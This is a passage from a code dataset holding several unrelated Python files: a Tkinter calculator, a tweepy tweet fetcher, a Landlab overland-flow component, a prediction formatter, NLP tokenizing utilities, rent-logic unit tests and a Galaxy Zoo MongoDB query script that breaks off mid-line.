columnspan=2, rowspan=2, padx=1, pady=1)\n elif(txt==\"Clear\"):\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n elif(txt=='<-'):\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n else:\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n col+=1;\n i+=1;\n window.mainloop()\ncalculator()\n","sub_path":"Calculator-IDLE.py","file_name":"Calculator-IDLE.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"641013428","text":"import tweepy\r\nfrom typing import List\r\nfrom datetime import datetime, timedelta\r\nfrom secrets import CONS_KEY, CONS_SECRET, ACC_SECRET, ACC_TOKEN\r\n\r\n# Function to authenticate to the Twitter API\r\ndef authentication(cons_key, cons_secret, acc_token, acc_secret):\r\n auth = tweepy.OAuthHandler(cons_key, cons_secret)\r\n auth.set_access_token(acc_token, acc_secret)\r\n api = tweepy.API(auth)\r\n return api\r\n\r\n\r\n# Function to get the last 10 tweets for a specific keyword\r\ndef get_tweets_by_keyword(keyword: str) -> List[str]:\r\n all_tweets = []\r\n api = authentication(CONS_KEY, CONS_SECRET, ACC_TOKEN, ACC_SECRET)\r\n yesterday_datetime = datetime.today().now() - timedelta(days=1)\r\n yesterday_date = yesterday_datetime.strftime(\"%Y-%m-%d\")\r\n try:\r\n for tweet in tweepy.Cursor(\r\n api.search,\r\n q=keyword,\r\n tweet_mode=\"extended\",\r\n since=yesterday_date,\r\n result_type=\"recent\",\r\n lang=\"it\",\r\n ).items(10):\r\n all_tweets.append(tweet.full_text)\r\n except Exception:\r\n print(\"Topic not found\")\r\n return all_tweets\r\n\r\n\r\n# Function to get the last 10 tweets by a specific user\r\ndef get_tweets_by_user(screen_name: str) -> List[str]:\r\n all_tweets = []\r\n api = authentication(CONS_KEY, CONS_SECRET, ACC_TOKEN, ACC_SECRET)\r\n screen_name = \"@\" + screen_name\r\n try:\r\n for tweet in tweepy.Cursor(\r\n api.user_timeline, screen_name=screen_name, tweet_mode=\"extended\"\r\n ).items(10):\r\n all_tweets.append(tweet.full_text)\r\n except Exception:\r\n print(\"User not found\")\r\n return all_tweets\r\n\r\n\r\n# def clean_tweets(all_tweets: List[str]) -> List[str]:\r\n# tweets_clean = []\r\n# for tweet in all_tweets:\r\n# #remove usernames\r\n# user_removed = re.sub(r'@[A-Za-z0-9]+','',tweet)\r\n# #remove links\r\n# link_removed = re.sub('https?://[A-Za-z0-9./]+','',user_removed)\r\n# #remove numbers\r\n# number_removed = re.sub('[^a-zA-Z]', ' ', link_removed)\r\n# #make the tweet lowercase\r\n# lower_case_tweet= number_removed.lower()\r\n# #remove unnecessary spaces\r\n# tok = WordPunctTokenizer()\r\n# words = tok.tokenize(lower_case_tweet)\r\n# clean_tweet = (' '.join(words)).strip()\r\n# print(\"Clean tweet \")\r\n# print(clean_tweet)\r\n# print(\"\\n\")\r\n# print(\"Original tweet \")\r\n# print(tweet)\r\n# tweets_clean.append(clean_tweet)\r\n# return tweets_clean\r\n\r\n# def get_sentiment(all_tweets: List[str]) -> List[float]:\r\n# sentiment_scores = []\r\n# for tweet in all_tweets:\r\n# blob = TextBlob(tweet)\r\n# sentiment_scores.append(blob.sentiment.polarity)\r\n# return sentiment_scores\r\n\r\n# def generate_average_sentiment_score(keyword: str) -> int:\r\n# tweets = get_tweets(keyword)\r\n# tweets_clean =clean_tweets(tweets)\r\n# sentiment_scores = get_sentiment(tweets_clean)\r\n# average_score = statistics.mean(sentiment_scores)\r\n# return average_score\r\n\r\n# if __name__ == \"__main__\":\r\n# print(\"What does the world prefer?\")\r\n# first_input = input()\r\n# print('...or...')\r\n# second_input = input()\r\n# print(\"\\n\")\r\n\r\n# first_score = generate_average_sentiment_score(first_input)\r\n# second_score = generate_average_sentiment_score(second_input)\r\n\r\n# print(f\"The first score is {first_score} and the second score is {second_score}\")\r\n# if(first_score > second_score):\r\n# print(f\"The humanity prefers {first_input} over {second_input}\")\r\n# elif(first_score < second_score):\r\n# print(f\"The humanity prefers {second_input} over {first_input}\")\r\n# else:\r\n# print(\"The two are equal\")\r\n","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574645359","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLandlab component for overland flow using a local implicit solution to the\nkinematic-wave approximation.\n\nCreated on Fri May 27 14:26:13 2016\n\n@author: gtucker\n\"\"\"\n\n\nfrom landlab import Component\nfrom landlab.components import FlowAccumulator\nfrom scipy.optimize import newton\nimport numpy as np\n\n\ndef water_fn(x, a, b, c, d, e):\n \"\"\"Evaluates the solution to the water-depth equation.\n\n Called by scipy.newton() to find solution for $x$ using Newton's method.\n\n Parameters\n ----------\n x : float\n Water depth at new time step.\n a : float\n \"alpha\" parameter (see below)\n b : float\n Weighting factor on new versus old time step. $b=1$ means purely\n implicit solution with all weight on $H$ at new time step. $b=0$ (not\n recommended) would mean purely explicit.\n c : float\n Water depth at old time step (time step $t$ instead of $t+1$)\n d : float\n Depth-discharge exponent; normally either 5/3 (Manning) or 3/2 (Chezy)\n e : float\n Water inflow volume per unit cell area in one time step.\n\n This equation represents the implicit solution for water depth $H$ at the\n next time step. In the code below, it is formulated in a generic way. \n Written using more familiar terminology, the equation is:\n\n $H - H_0 + \\alpha ( w H + (w-1) H_0)^d - \\Delta t (R + Q_{in} / A)$\n \n $\\alpha = \\frac{\\Delta t \\sum S^{1/2}}{C_f A}$\n \n where $H$ is water depth at the given node at the new time step, $H_0$ is\n water depth at the prior time step, $w$ is a weighting factor, $d$ is the\n depth-discharge exponent (2/3 or 1/2), $\\Delta t$ is time-step duration,\n $R$ is local runoff rate, $Q_{in}$ is inflow discharge, $A$ is cell area,\n $C_f$ is a dimensional roughness coefficient, and $\\sum S^{1/2}$ represents\n the sum of square-root-of-downhill-gradient over all outgoing (downhill)\n links.\n \"\"\"\n return x - c + a * (b * x + (b - 1.0) * c) ** d - e\n\n\nclass KinwaveImplicitOverlandFlow(Component):\n \"\"\"\n Calculate shallow water flow over topography.\n\n Landlab component that implements a two-dimensional kinematic wave model.\n This is a form of the 2D shallow-water equations in which energy slope is\n assumed to equal bed slope. The solution method is locally implicit, and\n works as follows. At each time step, we iterate from upstream to downstream\n over the topography. Because we are working downstream, we can assume that\n we know the total water inflow to a given cell. We solve the following mass \n conservation equation at each cell:\n \n $(H^{t+1} - H^t)/\\Delta t = Q_{in}/A - Q_{out}/A + R$\n \n where $H$ is water depth, $t$ indicates time step number, $\\Delta t$ is\n time step duration, $Q_{in}$ is total inflow discharge, $Q_{out}$ is total\n outflow discharge, $A$ is cell area, and $R$ is local runoff rate \n (precipitation minus infiltration; could be negative if runon infiltration\n is occurring).\n \n The specific outflow discharge leaving a cell along one of its faces is:\n \n $q = (1/C_r) H^\\alpha S^{1/2}$\n \n where $C_r$ is a roughness coefficient (such as Manning's n), $\\alpha$ is\n an exponent equal to 5/3 for the Manning equation and 3/2 for the Chezy\n family, and $S$ is the downhill-positive gradient of the link that crosses\n this particular face. Outflow discharge is zero for links that are flat or\n \"uphill\" from the given node. Total discharge out of a cell is then the\n sum of (specific discharge x face width) over all outflow faces\n \n $Q_{out} = \\sum_{i=1}^N (1/C_r) H^\\alpha S_i^{1/2} W_i$\n \n where $N$ is the number of outflow faces (i.e., faces where the ground\n slopes downhill away from the cell's node), and $W_i$ is the width of face\n $i$.\n \n We use the depth at the cell's node, so this simplifies to:\n\n $Q_{out} = (1/C_r) H'^\\alpha \\sum_{i=1}^N S_i^{1/2} W_i$\n \n We define $H$ in the above as a weighted sum of the \"old\" (time step $t$)\n and \"new\" (time step $t+1$) depth values:\n \n $H' = w H^{t+1} + (1-w) H^t$\n \n If $w=1$, the method is fully implicit. If $w=0$, it is a simple forward\n explicit method.\n \n When we combine these equations, we have an equation that includes the\n unknown $H^{t+1}$ and a bunch of terms that are known. If $w\\ne 0$, it is\n a nonlinear equation in $H^{t+1}$, and must be solved iteratively. We do\n this using a root-finding method in the scipy.optimize library.\n\n Construction:\n\n KinwaveImplicitOverlandFlow(grid, precip_rate=1.0,\n precip_duration=1.0,\n infilt_rate=0.0,\n roughness=0.01, **kwds)\n\n Parameters\n ----------\n grid : ModelGrid\n A Landlab grid object.\n precip_rate : float, optional (defaults to 1 mm/hr)\n Precipitation rate, mm/hr\n precip_duration : float, optional (defaults to 1 hour)\n Duration of precipitation, hours\n infilt_rate : float, optional (defaults to 0)\n Maximum rate of infiltration, mm/hr\n roughnes : float, defaults to 0.01\n Manning roughness coefficient, s/m^1/3\n\n Examples\n --------\n >>> from landlab import RasterModelGrid\n >>> rg = RasterModelGrid((4, 5), 10.0)\n >>> z = rg.add_zeros('node', 'topographic__elevation')\n >>> kw = KinwaveImplicitOverlandFlow(rg)\n >>> round(kw.runoff_rate * 1.0e7, 2)\n 2.78\n >>> kw.vel_coef # default value\n 100.0\n >>> rg.at_node['surface_water__depth'][6:9]\n array([ 0., 0., 0.])\n \"\"\"\n\n _name = 'KinwaveImplicitOverlandFlow'\n\n _input_var_names = (\n 'topographic__elevation',\n )\n\n _output_var_names = (\n 'topographic__gradient',\n 'surface_water__depth',\n #'water__velocity',\n #'water__specific_discharge',\n 'surface_water_inflow__discharge',\n )\n\n _var_units = {\n 'topographic__elevation': 'm',\n 'topographic__slope': 'm/m',\n 'surface_water__depth': 'm',\n 'water__velocity': 'm/s',\n 'water__specific_discharge': 'm2/s',\n }\n\n _var_mapping = {\n 'topographic__elevation': 'node',\n 'topographic__gradient': 'link',\n 'surface_water__depth': 'node',\n #'water__velocity': 'link',\n #'water__specific_discharge': 'link',\n 'surface_water_inflow__discharge' : 'node',\n }\n\n _var_doc = {\n 'topographic__elevation':\n 'elevation of the ground surface relative to some datum',\n 'topographic__gradient':\n 'gradient of the ground surface',\n 'surface_water__depth':\n 'depth of water',\n# 'water__velocity':\n# 'flow velocity component in the direction of the link',\n# 'water__specific_discharge':\n# 'flow discharge component in the direction of the link',\n 'surface_water_inflow__discharge':\n 'water volume inflow rate to the cell around each node'\n }\n\n def __init__(self, grid, runoff_rate=1.0, roughness=0.01,\n changing_topo=False, depth_exp=1.5, weight=1.0, **kwds):\n \"\"\"Initialize the KinwaveOverlandFlowModel.\n\n Parameters\n ----------\n grid : ModelGrid\n Landlab ModelGrid object\n runoff_rate : float, optional (defaults to 1 mm/hr)\n Precipitation rate, mm/hr\n roughnes : float, defaults to 0.01\n Manning roughness coefficient, s/m^1/3\n changing_topo : boolean, optional (defaults to False)\n Flag indicating whether topography changes between time steps\n depth_exp : float (defaults to 1.5)\n Exponent on water depth in velocity equation (3/2 for Darcy/Chezy,\n 5/3 for Manning)\n weight : float (defaults to 1.0)\n Weighting on depth at new time step versus old time step (1 = all\n implicit; 0 = explicit)\n \"\"\"\n\n # Store grid and parameters and do unit conversion\n self._grid = grid\n self.runoff_rate = runoff_rate / 3600000.0 # convert to m/s\n self.vel_coef = 1.0 / roughness # do division now to save time\n self.changing_topo = changing_topo\n self.depth_exp = depth_exp\n self.weight = weight\n\n # Get elevation field\n try:\n self.elev = grid.at_node['topographic__elevation']\n except:\n raise\n\n # Create fields...\n # Water depth\n if 'surface_water__depth' in grid.at_node:\n self.depth = grid.at_node['surface_water__depth']\n else:\n self.depth = grid.add_zeros('node', 'surface_water__depth')\n # Slope\n if 'topographic__gradient' in grid.at_link:\n self.slope = grid.at_link['topographic__gradient']\n else:\n self.slope = grid.add_zeros('link', 'topographic__gradient')\n # Velocity\n# if 'water__velocity' in grid.at_link:\n# self.vel = grid.at_link['water__velocity']\n# else:\n# self.vel = grid.add_zeros('link', 'water__velocity')\n # Discharge\n# if 'surface_water__specific_discharge' in grid.at_link:\n# self.disch = grid.at_link['surface_water__specific_discharge']\n# else:\n# self.disch = grid.add_zeros('link',\n# 'surface_water__specific_discharge')\n # Inflow discharge at nodes\n if 'surface_water_inflow__discharge' in grid.at_node:\n self.disch_in = grid.at_node['surface_water_inflow__discharge']\n else:\n self.disch_in = grid.add_zeros('node',\n 'surface_water_inflow__discharge')\n\n # This array holds, for each node, the sum of sqrt(slope) x face width\n # for each link/face.\n self.grad_width_sum = grid.zeros('node')\n\n # This array holds the prefactor in the algebraic equation that we\n # will find a solution for.\n self.alpha = grid.zeros('node')\n\n # Instantiate flow router\n self.flow_accum = FlowAccumulator(grid, 'topographic__elevation',\n flow_director='MFD',\n partition_method='square_root_of_slope')\n\n # Flag to let us know whether this is our first iteration\n self.first_iteration = True\n\n def run_one_step(self, dt, current_time=0.0, runoff_rate=None, **kwds):\n \"\"\"Calculate water flow for a time period `dt`.\n \"\"\"\n # Handle runoff rate\n if runoff_rate is None:\n runoff_rate = self.runoff_rate\n\n # If it's our first iteration, or if the topography may be changing,\n # do flow routing and calculate square root of slopes at links \n if self.changing_topo or self.first_iteration:\n\n # Calculate the ground-surface slope\n self.slope[self.grid.active_links] = \\\n self._grid.calc_grad_at_link(self.elev)[self._grid.active_links]\n \n # Take square root of slope magnitude for use in velocity eqn\n self.sqrt_slope = np.sqrt(np.abs(self.slope))\n\n # Re-route flow, which gives us the downstream-to-upstream\n # ordering\n self.flow_accum.run_one_step()\n self.nodes_ordered = self.grid.at_node['flow__upstream_node_order']\n self.flow_lnks = self.grid.at_node['flow__links_to_receiver_nodes']\n\n # (Re)calculate, for each node, sum of sqrt(gradient) x width\n self.grad_width_sum[:] = 0.0\n for i in range(self.flow_lnks.shape[1]):\n self.grad_width_sum[:] += (self.sqrt_slope[self.flow_lnks[:,i]]\n * self._grid.width_of_face[\n self.grid.face_at_link[self.flow_lnks[:,i]]])\n\n # Calculate values of alpha, which is defined as\n #\n # $\\alpha = \\frac{\\Sigma W S^{1/2} \\Delta t}{A C_r}$\n cores = self.grid.core_nodes\n self.alpha[cores] = (\n self.vel_coef * self.grad_width_sum[cores] * dt \n / (self.grid.area_of_cell[self.grid.cell_at_node[cores]]))\n\n # Zero out inflow discharge\n self.disch_in[:] = 0.0\n\n # Upstream-to-downstream loop\n for i in range(len(self.nodes_ordered) - 1, -1, -1):\n n = self.nodes_ordered[i]\n if self.grid.status_at_node[n] == 0:\n\n # Solve for new water depth\n aa = self.alpha[n]\n cc = self.depth[n]\n ee = ((dt * runoff_rate) \n + (dt * self.disch_in[n] \n / self.grid.area_of_cell[self.grid.cell_at_node[n]]))\n self.depth[n] = newton(water_fn, self.depth[n], \n args=(aa, self.weight, cc, \n self.depth_exp, ee))\n\n # Calc outflow\n Heff = (self.weight * self.depth[n]\n + (1.0 - self.weight) * cc)\n outflow = (self.vel_coef * (Heff ** self.depth_exp)\n * self.grad_width_sum[n]) # this is manning/chezy/darcy\n\n # Send flow downstream. Here we take total inflow discharge\n # and partition it among the node's neighbors. For this, we use\n # the flow director's \"proportions\" array, which contains, for\n # each node, the proportion of flow that heads out toward each\n # of its N neighbors. The proportion is zero if the neighbor is\n # uphill; otherwise, it is S^1/2 / sum(S^1/2). If for example\n # we have a raster grid, there will be four neighbors and four\n # proportions, some of which may be zero and some between 0 and\n # 1.\n self.disch_in[self.grid.neighbors_at_node[n]] += (outflow\n * self.flow_accum.flow_director.proportions[n])\n\n # TODO: the above is enough to implement the solution for flow\n # depth, but it does not provide any information about flow\n # velocity or discharge on links. This could be added as an\n # optional method, perhaps done just before output.\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"landlab/components/overland_flow/generate_overland_flow_implicit_kinwave.py","file_name":"generate_overland_flow_implicit_kinwave.py","file_ext":"py","file_size_in_byte":14450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"219297220","text":"#formats predictions in a way that can be uploaded to evaluation server \nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\nfrom statistics import mode \nfrom Params import * \n\n#predictions=open('ensemble.csv','r').read().split('\\n') \npredictions=open(sys.argv[1],'r').read().split('\\n') \nwhile '' in predictions: \n predictions.remove('') \n\nwnids=open(labels,'r').read().split('\\n') \nwhile '' in wnids: \n wnids.remove('') \n\n\n\n#training data \nfile_names=[]\n#labels=[] \n\nlabel_dict=dict()\nlabels=open(labels,'r').read().split('\\n')\nwhile '' in labels:\n labels.remove('')\nfor i in range(len(labels)):\n label_dict[labels[i]]=i\n\nfor label in label_dict:\n #print str(label) \n cur_dir=training_dir+label+\"/images\" \n onlyfiles = [f for f in listdir(cur_dir) if isfile(join(cur_dir, f))]\n onlyfiles=[cur_dir+'/'+f for f in onlyfiles]\n file_names=file_names+onlyfiles\n #print str(len(file_names)) \n #cur_labels=nsamples*[label_dict[label]]\n #labels=labels+cur_labels\n #print str(len(labels))\nonlyfiles=file_names \n\n#cur_dir=test_dir+\"images/\"\n#onlyfiles = [f for f in listdir(cur_dir) if isfile(join(cur_dir, f))]\n\nentries=100000\n#outf=open('ensemble_formatted.tsv','w') \noutf=open(sys.argv[2],'w') \n#outf.write('Image\\tPretrained\\tPretrainedFreezeAndStack\\tVGG_Like\\tRegularizationAndDropout\\tEnsemble\\n')\nfor i in range(entries): \n image_name=onlyfiles[i] \n predict_indices=predictions[i].split('\\t') \n predict_indices=[int(i) for i in predict_indices] \n wnid1=wnids[predict_indices[0]]\n #wnid2=wnids[predict_indices[1]] \n #wnid3=wnids[predict_indices[2]] \n #wnid4=wnids[predict_indices[3]] \n #try: \n # vote=mode([wnid1,wnid2,wnid3,wnid4])\n #except: \n # vote=wnid4\n #if len(set(predict_indices))==1: \n # #all 3 agree!!! \n # print image_name+ '\\t'+str(vote) +'\\t' + str(predict_indices)\n outf.write(image_name+'\\t'+str(wnid1)+'\\n')#+'\\t'+str(wnid2)+'\\t'+str(wnid3)+'\\t'+str(wnid4)+'\\t'+str(vote)+'\\n')\n\n","sub_path":"format_predictions_for_server.py","file_name":"format_predictions_for_server.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556020317","text":"import unicodedata\nimport os\nimport re\nimport random\nimport numpy as np\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nimport sys\n\n# Normalize text by mapping non-ascii characters to approximate ascii. e.g., beyonc'{e} becomes beyonce\ndef normalize_unicode(text):\n #return text.encode('ascii', 'ignore')\n return unicodedata.normalize('NFD', text).encode('ascii', 'ignore')\n\n# Standard word tokenizer.\n_treebank_word_tokenize = TreebankWordTokenizer().tokenize\n\ndef word_tokenize(text, language='english'):\n \"\"\"\n Return a tokenized copy of *text*,\n using NLTK's recommended word tokenizer\n (currently :class:`.TreebankWordTokenizer`\n along with :class:`.PunktSentenceTokenizer`\n for the specified language).\n\n :param text: text to split into sentences\n :param language: the model name in the Punkt corpus\n \"\"\"\n if sys.version_info[0] < 3:\n return [token for token in _treebank_word_tokenize(text)]\n else:\n return [token for token in _treebank_word_tokenize(text.decode(\"UTF-8\"))]\n\ndef get_ngrams(n, tokens, separator=\" \"):\n if n == 0:\n return [\" \".join(tokens)]\n\n # extract each n-token sequence from entire sequence of tokens\n ngrams = []\n for i, token in enumerate(tokens):\n # first k-gram at position k-1\n if i >= n - 1:\n ngrams.append(separator.join(tokens[i - n + 1:i + 1]))\n return ngrams\n\ndef get_vector(embedding, term):\n if term in embedding:\n return embedding[term]\n elif term.title() in embedding:\n return embedding[term.title()]\n elif term.lower() in embedding:\n return embedding[term.lower()]\n elif term.upper() in embedding:\n return embedding[term.upper()]\n return None\n\n\ndef get_word_vector(entity_model, word):\n if type(entity_model) == tuple:\n vocab, emb = entity_model\n wid = vocab[word]\n return emb[wid]\n else:\n return get_vector(entity_model, word)\n\ndef merge_two_dicts(x, y):\n \"\"\"Given two dicts, merge them into a new dict as a shallow copy.\"\"\"\n z = x.copy()\n z.update(y)\n return z\n\ndef invert_dict(dict):\n \"\"\"\n Convert a dict (string->int) into a list of strings (ie, dict value becomes list index)\n :param dict:\n :return:\n \"\"\"\n dict_inv = [\"\"] * (max(dict.values()) + 1)\n if sys.version_info[0] < 3:\n for word, index in dict.iteritems():\n dict_inv[index] = word\n else:\n for word, index in dict.items():\n dict_inv[index] = word\n return dict_inv\n\ndef clean_text(question):\n \"\"\"\n Prepare question text for tokenization: lowercase, remove punctuation, and remove episode numbers (these are added during Spark pipeline)\n e.g., \"Who plays in Seinfeld: The Contest S10E8?\" ==> \"who plays in seinfeld the contest\"\n :param question: string representing question (not tokenized)\n :return: string representing cleaned up question, ready for tokenization\n \"\"\"\n question = re.sub(\"[\\.\\t\\,\\:;\\(\\)\\?\\!]\", \" \", question.lower(), 0, 0)\n return re.sub(\"s\\d+e\\d+\", \"\", question, 0, 0)\n\ndef unsplit_query(query, qrepr, vocab_inv):\n \"\"\"\n Regenerate query from core elements, depending on the query representation.\n :param query: query as string\n :param qrepr: query representation (e.g., word or char).\n :param is_already_tokenized: use True if ``query'' was generated using vocab_inv (possibly using defeaturize),\n so we do not need to preprocess text\n :return:\n \"\"\"\n PAD_WORD_INDEX = 0\n if qrepr == \"word\":\n return \" \".join([vocab_inv[int(w)] for w in query if w != PAD_WORD_INDEX])\n elif qrepr == \"char\":\n return \"\".join([vocab_inv[int(w)] for w in query if w != PAD_WORD_INDEX])\n elif qrepr.endswith(\"gram\"):\n query_str = \"\"\n for w in query:\n if w != PAD_WORD_INDEX:\n if len(query_str) == 0:\n query_str = vocab_inv[int(w)]\n else:\n query_str += vocab_inv[int(w)][-1]\n return query_str[1:-1] # remove # mark in the beginning and end position.\n else:\n raise Exception(\"Unrecognized representation %s!\" % qrepr)\n\n\ndef split_sent(sent, qrepr, ngram_size=3):\n \"\"\"\n Split sentence into core elements, depending on the query representation.\n :param sent: sent as string\n :param qrepr: query representation (e.g., word or char).\n :param is_already_tokenized: use True if ``query'' was generated using vocab_inv (possibly using defeaturize),\n so we do not need to preprocess text\n :return:\n \"\"\"\n if qrepr == \"word\":\n return word_tokenize(sent)\n elif qrepr == \"char\":\n cs = list(sent)\n return [c for i, c in enumerate(cs) if i == 0 or c != \" \" or cs[i - 1] != \" \"]\n elif qrepr.endswith(\"gram\"):\n if sys.version_info[0] < 3:\n return get_ngrams(ngram_size, split_sent(\"#\"+sent+\"#\", \"char\"), separator=\"\")\n else:\n return get_ngrams(ngram_size, split_sent(\"#\" + sent.decode(\"utf-8\") + \"#\", \"char\"), separator=\"\")\n else:\n raise Exception(\"Unrecognized representation %s!\" % qrepr)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560524383","text":"import logging\nfrom common import errfunctions\n\nfrom decimal import Decimal\nimport unittest\nimport datetime\nimport sys\nfrom unittest.mock import MagicMock\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nfrom database.cacheddataquerier import getCachedDatesDataQuerier\nfrom database.daos import DateF2\nfrom exceptions.exceptions import DataResolveException\nfrom home import Main\nfrom rents.rentlogic import RentLogic\n\n\nclass RentLogicTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.app = QtWidgets.QApplication(sys.argv)\n cls.home = Main()\n\n def setUp(self):\n self.dataQuerier = MagicMock()\n\n def test_rentPeriodString_headrents_periods_sane_single_period(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllHeadRents(), 1, lambda x: x.hrCode)\n\n def test_rentPeriodString_headrents_periods_sane_2_periods(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllHeadRents(), 2, lambda x: x.hrCode)\n\n def test_rentPeriodString_rents_periods_sane_single_period(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllRents(), 1, lambda x: x.rentCode)\n\n def test_rentPeriodString_rents_periods_sane_2_periods(self):\n self.rentPeriodString_headrents_periods_sane(self.home.dataQuerier.getAllRents(), 2, lambda x: x.rentCode)\n\n def rentPeriodString_headrents_periods_sane(self, rents, periods, rentCodeGetter):\n datesDataQuerier = getCachedDatesDataQuerier(self.home.dbHandler)\n for rent in rents:\n try:\n rentPeriod = RentLogic.rentPeriodString(datesDataQuerier, rent.lastRentDate, rent.frequency, rent.dateCode, rent.arrears, rent.advArr, rent.rent, periods)\n startPeriod, endPeriod = [datetime.datetime.strptime(dateString, \"%d/%m/%Y\") for dateString in rentPeriod.split(\" to \")]\n\n daysInPeriod = (endPeriod - startPeriod).days\n daysOnePeriod = 365 / rent.frequency\n if rent.arrears > 0.05:\n arrearsMultiple = rent.arrears / (rent.rent / rent.frequency)\n expectedDaysInPeriod = Decimal(daysOnePeriod) * (periods + arrearsMultiple)\n else:\n expectedDaysInPeriod = daysOnePeriod * periods\n difference = abs(daysInPeriod - expectedDaysInPeriod)\n\n if difference > 14 * periods:# and arrearsMultiple % 1 < 0.1:\n errfunctions.print_err(\"rent code:\" + rentCodeGetter(rent))\n errfunctions.print_err(\"rent period:\" + rentPeriod)\n errfunctions.print_err(\"days in period:\" + str(daysInPeriod))\n errfunctions.print_err(\"expected days in period:\" + str(expectedDaysInPeriod))\n errfunctions.print_err(\"end - start:\" + str((endPeriod - startPeriod)))\n errfunctions.print_err(\"difference:\" + str(difference))\n errfunctions.print_err(\"arrears: {}, rent: {}, multiple: {}\".format(rent.arrears, rent.rent, arrearsMultiple))\n errfunctions.print_err(\"\\n\\n\")\n\n #self.assertTrue(difference < 15)\n\n self.assertTrue(endPeriod > startPeriod)\n\n except Exception as e:\n errfunctions.print_err(\"\\nfailed on: \" + rentCodeGetter(rent) + \"\\n\")\n #raise\n\n def dummyDate(self, date=\"01/01/2000\"):\n return datetime.datetime.strptime(date, \"%d/%m/%Y\").date()\n\n def test_resolveDateCode_resolves_f2_happy_case(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[DateF2([\"F2Jan01A\", self.dummyDate(), self.dummyDate()])])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate())\n self.assertEqual(\"F2Jan01A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_raises_f2_ambiguous(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[DateF2([\"F2Jan01A\", self.dummyDate(), self.dummyDate()]),\n DateF2([\"F2Jan01B\", self.dummyDate(), self.dummyDate()])])\n with self.assertRaises(DataResolveException):\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate())\n\n def test_resolveDateCode_makes_appropriate_guess_when_no_results_f2(self):\n self.dataQuerier.getF2FromDate = MagicMock(return_value=[])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 2, self.dummyDate(\"04/07/2010\"))\n self.assertEqual(\"F2Jul04A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_resolves_f4_happy_case(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[DateF2([\"F4Jan01A\", self.dummyDate(), self.dummyDate()])])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate())\n self.assertEqual(\"F4Jan01A\", dateCode, \"Datecode incorrect\")\n\n def test_resolveDateCode_raises_f4_ambiguous(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[DateF2([\"F4Jan01A\", self.dummyDate(), self.dummyDate()]),\n DateF2([\"F4Jan01B\", self.dummyDate(), self.dummyDate()])])\n with self.assertRaises(DataResolveException):\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate())\n\n def test_resolveDateCode_makes_appropriate_guess_when_no_results_f4(self):\n self.dataQuerier.getF4FromDate = MagicMock(return_value=[])\n dateCode = RentLogic.resolveDateCode(self.dataQuerier, 4, self.dummyDate(\"04/07/2010\"))\n self.assertEqual(\"F4Jul04A\", dateCode, \"Datecode incorrect\")\n","sub_path":"tests/rentlogictests.py","file_name":"rentlogictests.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"451245311","text":"from pymongo import MongoClient\n\nimport pandas as pd\n\nclient = MongoClient()\ndb = client.galaxy_zoo\n\nsubjects = db.subjects\nclassifications = db.classifications\n\n# cursor = subjects.find({'classification_count': 40})\n# cursor = subjects.find({'metadata.survey': 'decals'})\n\n# cursor = subjects.find({'metadata.dr': 'DR2'})\n#\n# for document in cursor[:10]:\n# print(document)\n\n # metadata = document['metadata']\n # print(metadata)\n # print(metadata['provided_image_id'])\n # print(metadata['dr'])\n # print(document['location']['standard'])\n\n# get previous decals classifications by zooniverse id\n# match classification <- zoo id -> nsa using galaxy zoo with nsa code\n\n# load expert catalog\n\nclassification = classifications.find_one()\nzooniverse_id = classification['subjects'][0]['zooniverse_id']\nprint(zooniverse_id)\n\nclassifications_of_id = classifications.find({'subjects': [zooniverse_id]})\nfor single_classification in classifications_of_id:\n print(single_classification)\n\nsubjects_with_id = subjects.find({'zooniverse_id': zooniverse_id})\nfor single_subject in subjects_with_id:\n print(single_subject)\n\n# cursor = classifications.find({'metadata.dr': 'DR2'})\n# cursor = subjects.find({'metadata.survey': 'candels'})\n\n# for document in cursor[:1]:\n#\n# print(document['annotations'])\n# for subject in document['subjects']:\n# print(subject['zooniverse_id'])\n# print(subject['metadata'])\n\n# subjects = subjects.find({'metadata.dr': 'DR2'})\n# for subject in subjects[:1]:\n# classifications_of_subject = 